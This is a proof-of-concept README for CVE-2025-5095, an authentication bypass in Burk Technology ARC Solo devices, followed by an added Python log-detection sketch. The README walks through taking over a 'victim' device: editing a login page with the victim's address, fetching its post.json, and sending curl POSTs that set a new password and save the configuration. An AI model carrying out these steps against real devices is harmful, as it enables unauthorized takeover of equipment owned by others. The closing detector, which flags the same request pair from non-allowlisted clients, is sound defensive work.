CVE-2025-5095 PoC — Burk Technology ARC Solo Missing Authentication for Critical Function

Associated Vulnerability
Title: Burk Technology ARC Solo Missing Authentication for Critical Function (CVE-2025-5095)
Description: Burk Technology ARC Solo's password change mechanism can be utilized without proper authentication procedures, allowing an attacker to take over the device. A password change request can be sent directly to the device's HTTP endpoint without providing valid credentials. The system does not enforce proper authentication or session validation, allowing the password change to proceed without verifying the request's legitimacy.
Description
Python POC for CVE-2025-5095
Readme
How To Use:

Open Login.htm and replace each occurrence of IP:PORT with the victim address.

Edit the var LoginVersion = "Check On The Victim Site"; line so that it matches the victim page's version. To find the version, visit the victim page and view its source.
**WARNING: THIS CVE ONLY WORKS ON VERSIONS OLDER THAN 1.0.60**

Download the post.json file from the victim site (http://victimip:port/post.json)
Move it to the script folder; the folder should now contain 3 files.

Now run the Python file and open 127.0.0.1:8080/login.htm. (If port 8080 is already in use, open the script in a text editor and change the port in the last part.)

*Ignore the alert when opening the login page*

Open a terminal and run these curl commands; if it prints "success", it worked.

curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"

curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"

To check if the page changed, send this command:

curl http://localhost:8080/check_password

Now visit the victim site (not the localhost one) and enter the new password; in this example, the password is "newtestpass".
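
Seen from the defender's side, the two requests above leave a recognizable pair in HTTP logs: a POST to /post.json that writes a UserPassword field, followed by one carrying UsersSaveConfig=true. The Python sketch below is an added example, not part of the original PoC repository; it flags that pair when it comes from a client outside an allowlist. The log format (an assumed reverse proxy in front of the device that records request bodies), the ADMIN_HOSTS set, the 60-second window and the sample lines are all assumptions constructed for illustration.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs

# Constructed sample: lines from an assumed reverse proxy in front of the device
# that logs "timestamp client method path body" with secret values redacted.
SAMPLE_LOG = """\
2025-06-01T10:00:01Z 10.0.5.20 GET /login.htm -
2025-06-01T10:00:05Z 10.0.5.20 POST /post.json UserPassword0=REDACTED
2025-06-01T10:00:06Z 10.0.5.20 POST /post.json UsersSaveConfig=true
2025-06-01T10:02:00Z 10.0.1.10 POST /post.json UserPassword0=REDACTED
2025-06-01T10:02:03Z 10.0.1.10 POST /post.json UsersSaveConfig=true
2025-06-01T10:05:00Z 10.0.7.7 POST /post.json UsersSaveConfig=true
"""

ADMIN_HOSTS = {"10.0.1.10"}  # assumption: hosts expected to manage the device
# The page shows UserPassword0; matching other indices is an assumption.
PASSWORD_KEY = re.compile(r"^UserPassword\d+$")


def find_password_changes(log_text, admin_hosts=ADMIN_HOSTS, window_s=60):
    """Alert when a non-admin client writes a password field to /post.json
    and then sends UsersSaveConfig=true within window_s seconds."""
    pending = {}  # client -> (time, field) of its latest password write
    alerts = []
    for line in log_text.splitlines():
        parts = line.split(None, 4)
        if len(parts) != 5:
            continue  # skip malformed lines
        ts, client, method, path, body = parts
        if method != "POST" or path.split("?")[0].lower() != "/post.json":
            continue
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        fields = parse_qs(body, keep_blank_values=True)
        written = [k for k in fields if PASSWORD_KEY.match(k)]
        if written:
            pending[client] = (when, written[0])
        if fields.get("UsersSaveConfig") == ["true"] and client in pending:
            start, field = pending.pop(client)
            in_window = (when - start).total_seconds() <= window_s
            if client not in admin_hosts and in_window:
                alerts.append({"client": client, "field": field, "saved_at": ts})
    return alerts


if __name__ == "__main__":
    for alert in find_password_changes(SAMPLE_LOG):
        print(alert)
```

On the sample lines only 10.0.5.20 is reported: 10.0.1.10 is on the allowlist, and 10.0.7.7 sends a save without a preceding password write.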